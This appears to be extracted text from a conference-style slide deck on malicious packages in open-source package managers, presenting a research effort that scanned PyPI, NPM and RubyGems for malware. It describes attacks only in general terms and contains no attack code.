developing digital products/services • Open source software makes up at least 70% of all software ◦ Source: 2020 Synopsys report “Software is eating the world” - Marc andreessen, 2011 “Open-source software is eating the world” - Everybody, 2021
on Package Managers ◦ Example, PyPi hosts over 300K Python packages • Code is “sourced” from Package Managers by installing ◦ Example, pip3 install dateutils # Packages
◦ Individual developers, groups, and companies • Software we use on our servers, laptops, phones, coffee makers, baby monitors, <add your favorite digital device here> is written by unknown volunteers ◦ Which we blindly TRUST?
bugs introduced accidentally, ◦ Example, buffer overflow (due to missing bound checks) • Pose indirect threats ◦ Need an exploit to trigger the buggy code ◦ May not always have a high impact • Can be fixed by upgrading to the latest version/release
their packages using their credentials • No checks or code vetting • Packages are searched and installed using names ◦ Package Managers (e.g., PyPi, NPM) do not show source code • Bad actors exploit new attack vectors to propagate malware 7
Exploits name typo during installation or dev inexperience - Removes safeguards: everyone on the same network can execute code on your machine with a single HTTP request
programming bug), ◦ Example, backdoor installed to steal sensitive data • Poses direct and dangerous threats ◦ Doesn’t need an exploit - itself is an exploit (e.g., triggered on installation) ◦ Is obfuscated to avoid detection ◦ Hidden in popular packages for wider reach ◦ Evasive - may only trigger under narrow conditions (e.g. production) • Can only be fixed by yanking malicious package/dependency version
is inferred from ◦ Number of GitHub stars/forks, ◦ Number of open issues on GitHub, ◦ Number of downloads ◦ Project documentation/website, ◦ Number of recent code commits, ◦ Number of tests cases ◦ Backing companies (e.g., FB, Uber) • BUT, ◦ Stars/forks/downloads are attacker-controlled ◦ Impersonated projects have the same website/documentation/tests/commits ◦ Should we look at the package code and hundreds of dependencies?
Graduated Dec’20, Georgia Tech - Cybersecurity/Systems research - Creator of ExtFUSE file system - eBPF + FUSE = Much faster FUSE - Created a 32-bit x86 OS (Capital) that boots from a 5.25” floppy disk
Tech in 2019 ◦ Downloaded and analyzed over 1.3M NPM+PyPi+RubyGems packages (60TB) ◦ Detected 339 previously unknown malware (82% confirmed, 3 CVEs, many over a year old) ◦ Details in academic paper: https://arxiv.org/pdf/2002.01139.pdf • Funded by NSF to continue development • Continuous scanning of packages ◦ PyPi supported (more coming soon!)
setup.py script downloads and spawns a python file (the download server is unreachable now) - comment mentions for security testing only, but the payload is unavailable MALWARE